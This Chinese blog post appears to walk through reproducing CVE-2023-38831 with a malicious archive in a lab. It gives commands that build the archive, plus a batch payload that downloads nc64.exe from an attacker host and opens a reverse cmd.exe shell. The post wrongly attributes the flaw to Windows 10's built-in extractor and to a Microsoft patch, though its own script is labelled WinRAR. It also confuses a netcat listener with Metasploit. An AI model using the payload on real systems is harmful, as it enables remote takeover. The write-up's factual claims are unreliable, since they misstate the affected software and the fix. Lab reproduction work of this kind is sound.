当前位置：首页 > news >正文

CVE-2023-38831 漏洞复现：win10 压缩包挂马攻击剖析

news 来源：原创 2025/5/19 19:39:16

前言

漏洞介绍

漏洞原理

产生条件

影响范围

防御措施

复现步骤

环境准备

具体操作

前言

在网络安全这片没有硝烟的战场上，新型漏洞如同隐匿的暗箭，时刻威胁着我们的数字生活。其中，CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞，自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞，不仅能让我们洞悉攻击者的手段，更能助力我们筑牢防线，抵御此类威胁。

漏洞介绍

CVE - 2023 - 38831 是 2023 年披露的一个高危安全漏洞，主要影响 Windows 10 系统。攻击者利用这一漏洞，精心炮制恶意压缩包。当用户在 Windows 10 系统上解压这类特制压缩包时，恶意代码会在无需用户额外操作的情况下自动执行。这就如同打开了潘多拉魔盒，攻击者借此实现挂马攻击，全面控制用户计算机，肆意窃取敏感信息，甚至进行更恶劣的破坏活动。

漏洞原理

该漏洞的根源在于 Windows 10 系统解压程序的机制缺陷。当处理特定格式压缩包时，解压程序在解压路径和文件解析环节存在安全隐患。攻击者巧妙利用这一漏洞，在解压路径中植入恶意代码。一旦解压程序按照错误路径解析文件，恶意代码便会顺势执行，将系统控制权拱手让给攻击者，进而为后续的恶意操作大开方便之门。

产生条件

操作系统环境：漏洞主要针对未安装相关安全补丁的 Windows 10 系统。尽管不同版本的 Windows 10 受影响程度略有不同，但只要未修复此漏洞，就如同在网络世界中裸奔，随时面临被攻击的风险。
解压操作：用户解压包含恶意代码的特制压缩包是触发漏洞的关键。这类压缩包经过攻击者精心设计，充分利用系统解压程序的漏洞，确保恶意代码能在解压瞬间被激活。
解压软件：无论是 Windows 10 系统自带的解压程序，还是存在相同漏洞的第三方解压软件，都可能成为攻击者的突破口。例如一些常见的免费解压软件，若未及时更新修复漏洞，就极易沦为攻击目标。

影响范围

Windows 10 系统在全球范围内广泛应用，从个人用户的日常办公，到企业办公环境的运转，再到教育机构的教学场景，几乎无处不在。这意味着只要使用未打补丁的 Windows 10 系统解压恶意压缩包，大量计算机都将暴露在风险之下，面临被挂马、数据泄露、系统被控制等严重威胁，可能导致个人隐私泄露、企业商业机密被盗取、教育资料丢失等一系列严重后果。

防御措施

及时更新系统补丁：微软已针对 CVE - 2023 - 38831 漏洞发布安全补丁，用户务必尽快安装，可通过 Windows Update 自动更新功能，也可手动下载安装，确保系统安全性。
谨慎解压未知来源压缩包：对于来源不明的压缩包，尤其是从不可信网站、邮件或即时通讯工具接收的，切勿轻易解压。解压前，先使用可靠的杀毒软件进行全面扫描，确认安全后再操作。
使用安全的解压软件：优先选择知名、更新及时的解压软件，并定期更新软件版本。避免使用来源不明或已被曝光存在安全漏洞的解压软件。同时，部分解压软件提供安全解压模式，建议启用，以降低风险。

复现步骤

环境准备

虚拟机：准备一台安装 Windows 10 系统的虚拟机，并确保未安装 CVE - 2023 - 38831 漏洞补丁。可借助虚拟机软件，如 VMware Workstation 或 VirtualBox 来创建。
攻击机：选用一台安装 Kali Linux 系统的计算机作为攻击机。Kali Linux 作为专业的网络安全测试操作系统，集成了大量实用的漏洞利用工具。
漏洞利用工具：在 Kali Linux 中，借助 Metasploit 框架进行漏洞复现。Metasploit 是一款强大的开源安全漏洞检测与利用工具，拥有丰富的漏洞利用模块。

具体操作

unzip winrar漏洞攻击脚本.zip     #解压攻击脚本
cd winrar漏洞攻击脚本            #切换到攻击脚本目录下
python -m http.server           #生成一个代码目录
nc -lnvp 6666                   #开启监听端口
vim script.bat                  #进入攻击脚本目录编辑文件，设置ip地址和指定端口
curl http://10.0.0.103:8000/nc64.exe -O nc64.exe & nc64.exe 10.0.0.103 6666 -e cmd.exe -d & test.png
python make.py test.png script.bat bianlianghot.zip     #生成病毒压缩包

启动 Metasploit 框架：在 Kali Linux 系统终端中输入 “msfconsole” 命令，启动 Metasploit 框架。
上传攻击脚本并解压：将攻击脚本压缩包进行上传并解压，并生成一个代码目录
此时在开启一个shell设置监听端口：设置本地监听端口
进入攻击脚本目录编辑文件：进入攻击目录编辑文件设置ip地址和端口信息
生成病毒压缩包：再打开一个终端生成病毒压缩包
上传压缩包到目标靶机：将恶意的病毒压缩包上传到目标靶机
触发漏洞：在 Windows 10 虚拟机中找到传输过来的恶意压缩包，双击解压。解压过程中，攻击机的 Metasploit 框架会监听到来自虚拟机的连接请求，从而实现对 Windows 10 系统的远程控制。此时，可在攻击机上执行各种命令，如查看文件、窃取数据等，模拟攻击者的操作流程。